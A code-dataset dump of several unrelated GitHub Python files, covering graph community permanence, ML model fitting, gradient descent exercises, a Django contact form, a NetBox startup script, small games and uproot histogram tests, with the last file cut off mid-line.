Normalized permanence between 0 and 1, it is a value\n normalized_permanence_v = (permanence_v + 1) / 2\n return normalized_permanence_v\n\n\n\nif __name__ == \"__main__\":\n graph = nx.karate_club_graph()\n # plot graph\n import matplotlib.pyplot as plt\n \n \n import sys\n sys.path.append(\"../../../\")\n from src.community_algs.detection_algs import DetectionAlgorithm\n community_structure = DetectionAlgorithm(\"walktrap\").compute_community(graph)\n community_target = community_structure[2]\n print(f\"Community target: {community_target}\")\n print(f\"Community structure: {community_structure}\")\n \n \n permanence_calculator = PermanenceCalculator(graph, community_target, community_structure)\n node_to_compute = community_target[3]\n permanence_value = permanence_calculator.permanence(node_to_compute)\n normalized_permanence_value = permanence_calculator.normalized_permanence(node_to_compute)\n \n print(f\"Permanence of node {node_to_compute}: {permanence_value}\")\n print(f\"Normalized permanence of node {node_to_compute}: {normalized_permanence_value}\")\n nx.draw(graph, with_labels=True)\n plt.show()\n","repo_name":"AndreaBe99/community-deception-thesis","sub_path":"src/community_algs/baselines/community_hiding/permanence.py","file_name":"permanence.py","file_ext":"py","file_size_in_byte":5921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"37728904918","text":"import pandas as pd\nfrom sklearn.linear_model import Ridge,LogisticRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier,RandomForestRegressor\nfrom sklearn.model_selection import KFold\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn import svm\nimport os, pickle\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom random import sample\n\nos.chdir(\"/home/cemarks/Projects/cancer/sandbox\")\n\nwith open(\"/home/cemarks/Projects/cancer/sandbox/expanded_training_X.pkl\",'rb') as f:\n X = pickle.load(f)\n\n\n# print(\"\\n\".join([str(i) + \" \" + X.columns[i] for i in range(X.shape[1])]))\n# # X['log_cde'] = X.apply(lambda z: z[7]/np.log(1+z[16]),axis=1)\n\nnot_founds = [\n (6002302, \"APOLLO-2-leaderboard\", 38),\n (2608243, \"Outcome-Predictors-leaderboard\", 31)\n]\n\nINPUT_DIR = \"/home/cemarks/Projects/cancer/data/leaderboard\"\nfile_names = os.listdir(INPUT_DIR)\nfile_splits = [os.path.splitext(f) for f in file_names]\ntsvs = [i for i in file_splits if i[1] == '.tsv']\ndbs = [i[0] for i in tsvs]\nfound_inds = (X['DB'] != not_founds[0][1]) | (X['col_no'] != not_founds[0][2])\nfor j in not_founds[1:len(not_founds)]:\n found_inds = found_inds & ((X['DB'] != j[1]) | (X['col_no'] != j[2]))\n\n\nY = X.loc[found_inds]\n\n\n\nz = []\nstat_columns = [\n \"max_cde\",\n \"max_dec\",\n \"max_que\",\n \"max_syn_classsum\",\n \"max_syn_propsum\",\n \"max_syn_objsum\",\n \"max_syn_classmax\",\n \"max_syn_propmax\",\n \"max_syn_objmax\",\n \"max_enum_concept\",\n \"max_enum_ans\",\n \"max_ans_score\",\n \"max_val_score\",\n \"max_secondary_search\",\n \"pct_cde\",\n \"pct_dec\",\n \"pct_que\",\n \"pct_syn_classsum\",\n \"pct_syn_propsum\",\n \"pct_syn_objsum\",\n \"pct_syn_classmax\",\n \"pct_syn_propmax\",\n \"pct_syn_objmax\",\n \"pct_enum_concept\",\n \"pct_enum_ans\",\n \"pct_ans_score\",\n \"pct_val_score\",\n \"pct_secondary_search\",\n \"logn\",\n \"n\",\n \"metric2_max\"\n]\nfor i in Y['DB'].unique():\n for j in Y['col_no'].loc[Y['DB'] == i].unique():\n z.append(Y.loc[(Y['DB']==i) & (Y['col_no'] == j),stat_columns].iloc[0])\n\n\n\nD = pd.DataFrame(z)\nD['Y'] = (D['metric2_max'] == 0).astype('int') #These are nomatch rows.\n\n# D['c1'] = D['pct_secondary_search'].multiply(D['max_syn_propsum'])\n# predictor_columns.append('c1')\n# D['c2'] = D['pct_secondary_search'].multiply(D['max_syn_propsum'])\n# predictor_columns.append('c2')\n# D['c3'] = D['pct_secondary_search'].multiply(D['max_enum_ans'])\n# predictor_columns.append('c3')\n# D['c3'] = D['pct_secondary_search'].multiply(D['n'])\n# predictor_columns.append('c3')\n\ndef lr_transform(x):\n predictor_columns = [\n \"max_cde\",\n \"max_dec\",\n \"max_que\",\n # \"max_syn_classsum\",\n # \"max_syn_propsum\",\n # \"max_syn_objsum\",\n # \"max_syn_classmax\",\n \"max_syn_propmax\",\n # \"max_syn_objmax\",\n # \"max_enum_concept\",\n # \"max_enum_ans\",\n # \"max_ans_score\",\n # \"max_val_score\",\n # \"max_secondary_search\",\n # \"pct_cde\",\n # \"pct_dec\",\n # \"pct_que\",\n # \"pct_syn_classsum\",\n # \"pct_syn_propsum\",\n # \"pct_syn_objsum\",\n # \"pct_syn_classmax\",\n # \"pct_syn_propmax\",\n # \"pct_syn_objmax\",\n # \"pct_enum_concept\",\n # \"pct_enum_ans\",\n # \"pct_ans_score\",\n # \"pct_val_score\",\n # \"pct_secondary_search\",\n # \"n\",\n \"logn\"\n ]\n x_copy = x.copy()\n x_copy['c1'] = x['pct_secondary_search'].multiply(x['max_enum_ans'])\n x_copy['c2'] = x['pct_secondary_search'].multiply(x['max_val_score'])\n predictor_columns = predictor_columns + ['c1','c2']\n return(x_copy[predictor_columns].values)\n\n\n# poly = PolynomialFeatures(degree=2)\n# X_poly = poly.fit_transform(D[predictor_columns])\nkf = KFold(n_splits=10,shuffle=True)\nINDS = kf.split(D)\no = []\not = []\n\nfor train_index,test_index in INDS:\n # XX = D[predictor_columns].iloc[train_index] \n # XT = D[predictor_columns].iloc[test_index] \n XX = lr_transform(D.iloc[train_index])\n XT = lr_transform(D.iloc[test_index])\n YY = D['Y'].iloc[train_index]\n YT = D['Y'].iloc[test_index]\n s = []\n st = []\n# for c in [0.00005,0.0001,0.0002,0.0005,0.001,0.005,0.01]:\n for c in range(-8,8):\n logreg = LogisticRegression(\n C = 10**c,\n max_iter = 10000,\n tol=0.000000001,\n solver='liblinear'\n )\n logreg.fit(XX,YY)\n s.append(logreg.score(XX,YY))\n st.append(logreg.score(XT,YT))\n o.append(s)\n ot.append(st)\n\no = np.array(o)\nm = np.mean(o,axis=0)\nprint(m)\nprint()\not = np.array(ot)\nmt = np.mean(ot,axis=0)\nprint(mt)\nprint()\n\n\n\n\n\n\n\nbest_c = 10\nbest_model = LogisticRegression(\n C = best_c,\n max_iter = 10000,\n tol=0.000000001,\n solver='liblinear'\n)\ntest_inds = sample(range(D.shape[0]),10)\ntng_inds = [i for i in range(D.shape[0]) if i not in test_inds]\n\nXX = lr_transform(D.iloc[tng_inds])\nXT = lr_transform(D.iloc[test_inds])\n\nYY = D['Y'].iloc[tng_inds]\nYT = D['Y'].iloc[test_inds]\nbest_model.fit(XX,YY)\nprint(best_model.score(XX,YY))\nprint(best_model.score(XT,YT))\n\n\nprobs = best_model.predict_proba(\n XX\n)\n\ngt = [(probs[i][0],YY.iloc[i]) for i in range(len(probs))]\ngt.sort(key=lambda z: z[0])\nx = [0]\ny = [0]\n\npos_count = sum([i[1] for i in gt])\nneg_count = len(gt) - pos_count\n\nx_count = 0\ny_count = 0\nxpt = []\nypt = []\nfound = False\nfor i in gt:\n if i[1] == 0:\n x_count+=1\n else:\n y_count+=1\n if (not found) and (i[0] > 0.66):\n found = True\n xpt.append(x_count/neg_count)\n ypt.append(y_count/pos_count)\n x.append(x_count/neg_count)\n y.append(y_count/pos_count)\n\nx.append(1)\ny.append(1)\n\nplt.plot(x,y)\nplt.scatter(xpt,ypt,s=30,c='red')\nplt.plot([0,1],[0,1],\"--\")\nplt.show()\nplt.clf()\nplt.close()\n\n\nprobs = logreg.predict_proba(\n XT\n)\n\ngt = [(probs[i][0],YT.iloc[i]) for i in range(len(probs))]\ngt.sort(key=lambda z: z[0])\nx = [0]\ny = [0]\n\npos_count = sum([i[1] for i in gt])\nneg_count = len(gt) - pos_count\n\nx_count = 0\ny_count = 0\nfor i in gt:\n if i[1] == 0:\n x_count+=1\n else:\n y_count+=1\n x.append(x_count/neg_count)\n y.append(y_count/pos_count)\n\nx.append(1)\ny.append(1)\n\nplt.plot(x,y)\nplt.plot([0,1],[0,1],\"--\")\nplt.show()\nplt.clf()\nplt.close()\n\nmodel_dict = {\n 'model': best_model\n}\n\nwith open('nomatch_model.pkl', 'wb') as f:\n pickle.dump(model_dict,f)\n\n\n\n\n#################\n\n# Round II: get best value columns\n\nZ = Y.loc[Y['metric4']==1]\n\ndef rr_transform(x):\n predictor_columns = [\n \"secondary_search\",\n # \"ftsearch_cde\",\n \"ftsearch_dec\",\n # \"syn_classsum\",\n \"syn_propsum\",\n # \"syn_objsum\",\n # \"syn_classmax\",\n # \"syn_propmax\",\n # \"syn_objmax\",\n # \"ftsearch_question\",\n # \"enum_concept_search\",\n # \"enum_answer_search\",\n # \"answer_count_score\",\n \"value_score\",\n # \"max_cde\",\n # \"max_dec\",\n # \"max_que\",\n # \"max_syn_classsum\",\n # \"max_syn_propsum\",\n # \"max_syn_objsum\",\n # \"max_syn_classmax\",\n # \"max_syn_propmax\",\n # \"max_syn_objmax\",\n # \"max_enum_concept\",\n # \"max_enum_ans\",\n # \"max_ans_score\",\n # \"max_val_score\",\n # \"max_secondary_search\",\n # \"pct_cde\",\n # \"pct_dec\",\n # \"pct_que\",\n # \"pct_syn_classsum\",\n # \"pct_syn_propsum\",\n \"pct_syn_objsum\",\n # \"pct_syn_classmax\",\n # \"pct_syn_propmax\",\n #\"pct_syn_objmax\",\n # \"pct_enum_concept\",\n # \"pct_enum_ans\",\n # \"pct_ans_score\",\n # \"pct_val_score\",\n \"pct_secondary_search\",\n \"cde_frac\",\n # \"dec_frac\",\n \"que_frac\",\n # \"syn_classsum_frac\",\n # \"syn_propsum_frac\",\n # \"syn_objsum_frac\",\n # \"syn_classmax_frac\",\n \"syn_propmax_frac\",\n # \"syn_objmax_frac\",\n \"enum_concept_frac\",\n # \"enum_ans_frac\",\n # \"ans_score_frac\",\n # \"val_score_frac\",\n \"n\",\n \"logn\"\n ]\n poly = PolynomialFeatures(degree = 2)\n Z_poly = poly.fit_transform(x[predictor_columns])\n return Z_poly\n\n\no=[]\nfor i in range(len(tsvs)):\n tsv = tsvs[i][0]\n J = Z['col_no'].loc[Z['DB']==tsv].unique()\n for j in range(len(J)):\n o.append((tsv,J[j]))\n\nrand_ints = np.random.permutation(range(len(o)))\ntrain_test_splitpoint = int(0.85*len(rand_ints))\ntraining_inds = rand_ints[0:train_test_splitpoint]\ntest_inds = rand_ints[train_test_splitpoint:len(rand_ints)]\n\ntrain_vector = pd.Series([False]*len(Z))\ntrain_vector.index = Z.index\n\nfor t,i in enumerate(training_inds):\n train_vector = train_vector | ((Z['DB']==o[i][0]) & (Z['col_no']==o[i][1]))\n\ntest_vector = pd.Series([False]*len(Z))\ntest_vector.index = Z.index\n\nfor t,i in enumerate(test_inds):\n test_vector = test_vector | ((Z['DB']==o[i][0]) & (Z['col_no']==o[i][1]))\n\n# Z_poly= poly.fit_transform(Z[predictor_columns])\n\nZ_poly = rr_transform(Z)\nZ_train = Z_poly[train_vector]\nZ_test = Z_poly[test_vector]\n\nYY = Z['metric2_frac'].pow(2).values\n\n# for k in range(1,min(11,len(predictor_columns))):\nfor k in range(-4,4,1):\n # rfr = RandomForestRegressor(\n # n_estimators = 30,\n # max_features = k\n # )\n rfr = Ridge(\n alpha=10**k,\n fit_intercept = True,\n normalize= True,\n tol = 0.00001,\n solver='lsqr', # auto, svd, cholesky, lsqr, sparse_cg, sag, saga\n )\n rfr.fit(Z_train,YY[train_vector])\n print(k)\n print(rfr.score(Z_train,YY[train_vector]))\n print(rfr.score(Z_test,YY[test_vector]))\n print()\n\nrfr = Ridge(\n alpha=0.1,\n fit_intercept = True,\n normalize= True,\n tol = 0.00001,\n solver='lsqr', # auto, svd, cholesky, lsqr, sparse_cg, sag, saga\n)\n# rfr.fit(Z[predictor_columns].loc[train_vector],(Z['metric2'].loc[train_vector]))\n# print(k)\n# print(rfr.score(Z[predictor_columns].loc[train_vector],(Z['metric2'].loc[train_vector])))\n# print(rfr.score(Z[predictor_columns].loc[test_vector],(Z['metric2'].loc[test_vector])))\nrfr.fit(Z_train,YY[train_vector])\nprint(rfr.score(Z_train,YY[train_vector]))\nprint(rfr.score(Z_test,YY[test_vector]))\nprint()\n\n\n\n\nmodel_dict = {\n 'model': rfr\n}\n\nwith open('value_regression.pkl', 'wb') as f:\n pickle.dump(model_dict,f)\n\nZ['metric2_predict'] = rfr.predict(Z_poly)\n\nfor i in range(12):\n o2 = []\n ss = 0\n # for i in range(len(tsvs)):\n tsv = o[test_inds[i]][0]\n col_no = o[test_inds[i]][1]\n A = Z.loc[(Z['DB']==tsv) & (Z['col_no']==col_no),['metric1','metric2','metric2_predict','index']]\n l = A.values.tolist()\n l.sort(key = lambda z: z[2], reverse=True)\n for ii in range(min(20,len(l))):\n print(l[ii])\n print()\n print()\n\nprint(\"\\t\".join([str(kk) for kk in l[0]]))\nk = 0\nif 1.5 in [i[0] for i in l]:\n best_ind = [i[0] for i in l].index(1.5)\n best_ind_score = l[best_ind][2]\nelse:\n best_ind = None\n best_ind_score = None\nwhile (l[k][1]==1) and (k < len(l)):\n k += 1\nif k == 0:\n o2.append((k,best_ind,best_ind_score,None,None,l[k][1],l[k][2]))\nelif k == len(l):\n o2.append((k,best_ind,best_ind_score,l[k-1][1],l[k-1][2],None,None))\nelse:\n o2.append((k,best_ind,best_ind_score,l[k-1][1],l[k-1][2],l[k][1],l[k][2]))\n\n\n\n\n","repo_name":"cemarks/metadata_automation","sub_path":"sandbox/learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":11274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4872440609","text":"import random\r\nimport matplotlib.pyplot as plt\r\nfrom typing import List, Callable, TypeVar, Iterator\r\nfrom scratch.linear_algebra import distance, add, scalar_multiply, vector_mean\r\n\r\nVector = List[float]\r\n# 경사 하강법\r\n# 그래디언트 계산하기\r\ndef difference_quotient(f: Callable[[float], float], x: float, h: float) -> float:\r\n return (f(x+h) - f(x)) / h\r\n\r\ndef plot_estimated_derivative():\r\n def square(x):\r\n return x*x\r\n def derivative(x):\r\n return 2 * x\r\n\r\n xs = range(-10, 11)\r\n actuals = [derivative(x) for x in xs]\r\n estimate = [difference_quotient(square, x, h= 0.001) for x in xs]\r\n\r\n plt.title(\"Actual Derivatives vs Estimates\")\r\n plt.plot(xs, actuals, 'rx', label = 'Actual')\r\n plt.plot(xs, estimate, 'b+', label='Estimates')\r\n plt.legend(loc=9)\r\n plt.show()\r\n\r\nplot_estimated_derivative()\r\n\r\ndef partial_difference_quotient(f: Callable[[Vector], float], v: Vector, i: int, h: float) -> float:\r\n # 함수 f의 i번째 편도함수가 v에서 가지는 값\r\n w = [v_j + (h if j == i else 0) for j, v_j in enumerate(v)]\r\n\r\ndef estimate_gradient(f: Callable[[Vector], float], v: Vector, h: float = 0.0001):\r\n return [partial_difference_quotient(f,v,i,h) for i in range(len(v))]\r\n\r\n#그레디언트 적용하기\r\ndef gradient_step(v: Vector, gradient: Vector, step_size: float) -> Vector:\r\n # v에서 step_size만큼 이동하기\r\n assert len(v) == len(gradient)\r\n step = scalar_multiply(step_size, gradient)\r\n return add(v, step)\r\n\r\ndef sum_of_squares_gradient(v: Vector) -> Vector:\r\n return [2 * v_i for v_i in v]\r\n\r\n# 임의의 시작점을 선택\r\nv = [random.uniform(-10, 10)for i in range(3)]\r\n\r\nfor epoch in range(1000):\r\n grad = sum_of_squares_gradient(v) # v의 그래디언트 계산\r\n v = gradient_step(v, grad, -0.01) # 그래디언트의 음수만큼 이동`\r\n print(epoch, v)\r\n\r\nassert distance(v, [0,0,0]) < 0.001 # v는 0에 수렴해야 한다.\r\n\r\n#경사 하강법으로 모델 학습\r\n# 한 개의 데이터 포인트에서 오차의 그래디언트를 계산해 주는 함수\r\ndef linear_gradient(x: float, y: float, theta: Vector) -> Vector:\r\n slope, intercept = theta\r\n predicted = slope * x + intercept # 모델의 예측값\r\n error = (predicted - y) # 오차는 (예측값 - 실제값)\r\n squared_error = error ** 2 # 오차의 제곱을 최소화하자\r\n grad = [2 * error * x, 2 * error] # 그래디언트를 사용한다.\r\n return grad\r\n\r\n# 전체 데이터 셋에서 평균 제곱 오차의 그래디어튼를 계산해 주는 함수\r\ntheta = [random.uniform(-1, 1), random.uniform(-1, 1)]\r\n\r\nlearning_rate = 0.001\r\ninputs = [(x, 20 * x + 5) for x in range(-50, 50)]\r\n\r\nfor epoch in range(5000):\r\n grad = vector_mean([linear_gradient(x, y, theta) for x, y in inputs])\r\n theta = gradient_step(theta, grad, -learning_rate)\r\n\r\nslope, intercept = theta\r\nassert 19.9 < slope < 20.1\r\nassert 4.9 < intercept < 5.1\r\n\r\n#미니배치 경사 하강법\r\nT = TypeVar('T') # 변수의 타입과 무관한 함수를 생성\r\n\r\ndef minibatches(dataset: List[T], batch_size: int, shuffle: bool = True) -> Iterator[List[T]]:\r\n #dataset에서 batch_size만큼 데이터 포인트를 샘플링해서 미니배치를 생성\r\n #각 미니배치의 시작점인 0, batch_size, 2 * batch_size, ...을 나열\r\n batch_starts = [start for start in range(0, len(dataset), batch_size)]\r\n\r\n if shuffle: random.shuffle(batch_starts) #미니배치의 순서를 섞는다.\r\n\r\n for start in batch_starts:\r\n end = start + batch_size\r\n yield dataset[start:end]\r\n\r\n #미니배치\r\n theta = [random.uniform(-1, 1), random.uniform(-1, 1)]\r\n\r\n for epoch in range(1000):\r\n for batch in minibatches(inputs, batch_size=20):\r\n grad = vector_mean([linear_gradient(x, y, theta) for x, y in batch])\r\n theta = gradient_step(theta, grad, -learning_rate)\r\n print(epoch, theta)\r\n\r\n slope, intercept = theta\r\n assert 19.9 < slope < 20.1\r\n assert 4.9 < intercept < 5.1\r\n\r\n #SGD(stochastic gradient descent)\r\n for epoch in range(500):\r\n for x, y in inputs:\r\n grad = linear_gradient(x, y, theta)\r\n theta = gradient_step(theta, grad, -learning_rate)\r\n print(epoch, theta)\r\n\r\n slope, intercept = theta\r\n assert 19.9 < slope < 20.1\r\n assert 4.9 < intercept < 5.1","repo_name":"thoonk/DataScience","sub_path":"ch04/Gradient_descent.py","file_name":"Gradient_descent.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"9899601384","text":"def calculateMex(Set): \n Mex = 0\n \n while (Mex in Set): \n Mex += 1\n \n return (Mex) \n \n# A function to Compute Grundy Number of 'n' \n# Only this function varies according to the game \ndef calculateGrundy( n, dp): \n if (n == 0): \n return (0) \n \n if dp[n]!=-1:\n return dp[n]\n \n Set = set() # A Hash Table \n\n for i in range(n): \n \n Set.add(calculateGrundy(i,dp)); \n \n dp[n]=calculateMex(Set)\n return (dp[n])\n \n# Driver program to test above functions \nn = 5; \ndp=[-1]*(n+1)\nprint(calculateGrundy(n,dp)) \nprint(dp)","repo_name":"NavalPangtey/Competitive-programming","sub_path":"python/algo/grundyno.py","file_name":"grundyno.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3605657744","text":"from django.core.mail import EmailMessage\nfrom django.shortcuts import render, redirect\nfrom django.views.generic import View\nfrom django.http import HttpResponse\nfrom django.contrib import messages\n\nfrom .forms import ContactForm\n\ndef contact(request):\n if request.method == 'POST':\n form = ContactForm(request.POST)\n if form.is_valid():\n sender_name = form.cleaned_data['name']\n sender_email = form.cleaned_data['email']\n\n sender_message = form.cleaned_data['message']\n email = EmailMessage(\n \"New contact form submission on MASDAP\",\n sender_message,\n 'masdap.mw@gmail.com',\n ['masdap.mw@gmail.com'],\n cc=(sender_email,),\n headers = {'Reply-To': sender_email}\n )\n email.send()\n\n messages.success(request, 'Thanks for reaching out! Your message has been sent.')\n return redirect('contact')\n else:\n form = ContactForm()\n\n return render(request, 'contact.html', {\n 'form': form\n })\n","repo_name":"MalawiGeospatialTools/masdap","sub_path":"masdap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"33114304233","text":"import sys\nfrom secrets.models import SecretRole\n\nfrom startup_script_utils import load_yaml\n\nsecret_roles = load_yaml(\"/opt/netbox/initializers/secret_roles.yml\")\n\nif secret_roles is None:\n sys.exit()\n\nfor params in secret_roles:\n secret_role, created = SecretRole.objects.get_or_create(**params)\n\n if created:\n print(\"🔑 Created Secret Role\", secret_role.name)\n","repo_name":"rafaeltadeu01/sifs","sub_path":"docker-compose/netbox/startup_scripts/310_secret_roles.py","file_name":"310_secret_roles.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"34697137806","text":"import sqlite3\r\n\r\n#connect the database\r\nconn = sqlite3.connect('Mulesoft SQL.db')\r\n\r\n#craete a cursor\r\nc = conn.cursor()\r\n\r\n#craete a Query\r\nc.execute(\"SELECT * FROM Movies\")\r\n\r\nc.execute(\"SELECT Name FROM Movies Where Actor = 'Salman Khan'\")\r\n\r\nprint(c.fetchall())\r\n\r\n#commit the db\r\nconn.commit\r\n\r\n#Close the db\r\nconn.close\r\n","repo_name":"Xmen143/SQLite-Project","sub_path":"sqlite31.py","file_name":"sqlite31.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34671335414","text":"from pxr import Usd, UsdSkel, UsdGeom\nimport unittest\n\n\nclass TestUsdSkelRoot(unittest.TestCase):\n\n def test_ComputeExtentPlugin(self):\n \"\"\"Tests plugin for computing extents on a UsdSkelRoot.\"\"\"\n\n testFile = \"root.usda\"\n stage = Usd.Stage.Open(testFile)\n\n boundable = UsdGeom.Boundable(stage.GetPrimAtPath(\"/Root\"))\n\n for time in range(int(stage.GetStartTimeCode()),\n int(stage.GetEndTimeCode())+1):\n UsdGeom.Boundable.ComputeExtentFromPlugins(boundable, time)\n\n stage.GetRootLayer().Export(\"root.computedExtents.usda\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"PixarAnimationStudios/OpenUSD","sub_path":"pxr/usd/usdSkel/testenv/testUsdSkelRoot.py","file_name":"testUsdSkelRoot.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":5042,"dataset":"github-code","pt":"3"} +{"seq_id":"12544377100","text":"from gameLogic import Game\nimport random\n\ndef readAllWord(fileName):\n with open(fileName) as f:\n return [x.strip() for x in f.readlines()] \n\ndef getUniqueWord(listOfWords):\n return listOfWords[(random.randrange(0, len(listOfWords)))]\n\n\nif __name__ == \"__main__\":\n allWords =readAllWord(\"corpus.txt\")\n\n myGame = Game(5, getUniqueWord(allWords))\n \n myGame.gameStart()\n ","repo_name":"CiprianBodnar/CLM-laboratories","sub_path":"laborator3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27210351321","text":"def blackjack_advice():\n card_points = {\n 'A': 1,\n '2': 2,\n '3': 3,\n '4': 4,\n '5': 5,\n '6': 6,\n '7': 7,\n '8': 8,\n '9': 9,\n '10': 10,\n 'J': 10,\n 'Q': 10,\n 'K': 10\n }\n\n choice1 = input('What is your first card? ')\n choice2 = input('What is your second card? ')\n choice3 = input('What is your third card? ')\n\n card_sum = int(card_points[choice1]) + int(card_points[choice2]) + int(card_points[choice3])\n \n if card_sum < 17:\n print(f'{card_sum} Hit')\n elif 17 <= card_sum < 21:\n print(f'{card_sum} Stay')\n elif card_sum == 21:\n print('Blackjack!')\n else: \n print('Already Busted')\n\nblackjack_advice()","repo_name":"PdxCodeGuild/class_HB2","sub_path":"code/zach/python/lab04_blackjack_advice.py","file_name":"lab04_blackjack_advice.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18343438827","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/uproot5/blob/main/LICENSE\n\nimport os\n\nimport numpy as np\nimport pytest\n\nimport uproot\nimport uproot.writing\n\nROOT = pytest.importorskip(\"ROOT\")\nhist = pytest.importorskip(\"hist\")\n\n\ndef test_regular_1d(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n with uproot.recreate(newfile) as fout:\n fout[\"h1\"] = (\n hist.Hist.new.Reg(10, -5, 5, name=\"wow\", label=\"wee\")\n .Weight()\n .fill([-2, 3, 3, 1, 99], weight=[1, 1, 5, 5, 3])\n )\n\n with uproot.open(newfile) as fin:\n h1 = fin[\"h1\"]\n assert h1.member(\"fEntries\") == 15\n assert h1.values(flow=True).tolist() == pytest.approx(\n [0, 0, 0, 0, 1, 0, 0, 5, 0, 6, 0, 3]\n )\n assert h1.axis().member(\"fName\") == \"xaxis\"\n assert h1.axis().member(\"fTitle\") == \"wee\"\n assert h1.axis().member(\"fXmin\") == -5\n assert h1.axis().member(\"fXmax\") == 5\n assert len(h1.axis().member(\"fXbins\")) == 0\n\n f = ROOT.TFile(newfile)\n h2 = f.Get(\"h1\")\n assert h2.GetEntries() == 15\n assert h2.GetBinContent(9) == 6\n assert h2.GetBinContent(11) == 3\n assert h2.GetXaxis().GetName() == \"xaxis\"\n assert h2.GetXaxis().GetTitle() == \"wee\"\n assert h2.GetBinLowEdge(1) == pytest.approx(-5)\n assert h2.GetBinWidth(1) == pytest.approx(1)\n f.Close()\n\n\ndef test_variable_1d(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n with uproot.recreate(newfile) as fout:\n fout[\"h1\"] = (\n hist.Hist.new.Var([-5, -3, 0, 1, 2, 10], name=\"wow\", label=\"wee\")\n .Weight()\n .fill([-2, 3, 3, 1, 99], weight=[1, 1, 5, 5, 3])\n )\n\n with uproot.open(newfile) as fin:\n h1 = fin[\"h1\"]\n assert h1.member(\"fEntries\") == 15\n assert h1.values(flow=True).tolist() == pytest.approx([0, 0, 1, 0, 5, 6, 3])\n assert h1.axis().member(\"fName\") == \"xaxis\"\n assert h1.axis().member(\"fTitle\") == \"wee\"\n assert h1.axis().member(\"fXmin\") == -5\n assert h1.axis().member(\"fXmax\") == 10\n assert list(h1.axis().member(\"fXbins\")) == pytest.approx([-5, -3, 0, 1, 2, 10])\n\n f = ROOT.TFile(newfile)\n h2 = f.Get(\"h1\")\n assert h2.GetEntries() == 15\n assert h2.GetBinContent(5) == 6\n assert h2.GetBinContent(6) == 3\n assert h2.GetXaxis().GetName() == \"xaxis\"\n assert h2.GetXaxis().GetTitle() == \"wee\"\n assert h2.GetBinLowEdge(1) == pytest.approx(-5)\n assert h2.GetBinWidth(1) == pytest.approx(2)\n f.Close()\n\n\ndef test_regular_2d(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n with uproot.recreate(newfile) as fout:\n tmp = (\n hist.Hist.new.Reg(10, -5, 5, name=\"wow\", label=\"wee\")\n .Reg(8, 2, 10)\n .Weight()\n .fill([-2, 3, 3, 1, 99], [9, 9, 9, 4, 4], weight=[1, 1, 5, 5, 3])\n )\n asarray = tmp.values(flow=True)\n assert asarray[9, 8] == 6\n assert asarray[8, 9] == 0\n fout[\"h1\"] = tmp\n\n with uproot.open(newfile) as fin:\n h1 = fin[\"h1\"]\n assert h1.member(\"fEntries\") == 15\n assert h1.axis(0).member(\"fName\") == \"xaxis\"\n assert h1.axis(0).member(\"fTitle\") == \"wee\"\n assert h1.axis(0).member(\"fXmin\") == -5\n assert h1.axis(0).member(\"fXmax\") == 5\n assert h1.axis(1).member(\"fXmin\") == 2\n assert h1.axis(1).member(\"fXmax\") == 10\n assert np.allclose(asarray, h1.values(flow=True))\n assert np.allclose(asarray, h1.to_hist().values(flow=True))\n\n f = ROOT.TFile(newfile)\n h2 = f.Get(\"h1\")\n assert h2.GetEntries() == 15\n assert h2.GetBinContent(9, 8) == 6\n assert h2.GetBinContent(8, 9) == 0\n f.Close()\n\n\ndef test_regular_3d(tmp_path):\n newfile = os.path.join(tmp_path, \"newfile.root\")\n\n with uproot.recreate(newfile) as fout:\n tmp = (\n hist.Hist.new.Reg(10, -5, 5, name=\"wow\", label=\"wee\")\n .Reg(8, 2, 10)\n .Reg(2, -2, 2)\n .Weight()\n .fill(\n [-2, 3, 3, 1, 99],\n [9, 9, 9, 4, 4],\n [1, 1, 1, -1, -1],\n weight=[1, 1, 5, 5, 3],\n )\n )\n asarray = tmp.values(flow=True)\n assert asarray[9, 8, 2] == 6\n assert asarray[8, 9, 2] == 0\n assert asarray[9, 8, 1] == 0\n fout[\"h1\"] = tmp\n\n with uproot.open(newfile) as fin:\n h1 = fin[\"h1\"]\n assert h1.member(\"fEntries\") == 15\n assert h1.axis(0).member(\"fName\") == \"xaxis\"\n assert h1.axis(0).member(\"fTitle\") == \"wee\"\n assert h1.axis(0).member(\"fXmin\") == -5\n assert h1.axis(0).member(\"fXmax\") == 5\n assert h1.axis(1).member(\"fXmin\") == 2\n assert h1.axis(1).member(\"fXmax\") == 10\n assert h1.axis(2).member(\"fXmin\") == -2\n assert h1.axis(2).member(\"fXmax\") == 2\n assert np.allclose(asarray, h1.values(flow=True))\n assert np.allclose(asarray, h1.to_hist().values(flow=True))\n\n f = ROOT.TFile(newfile)\n h2 = f.Get(\"h1\")\n assert h2.GetEntries() == 15\n assert h2.GetBinContent(9, 8, 2) == 6\n assert h2.GetBinContent(8, 9, 2) == 0\n assert 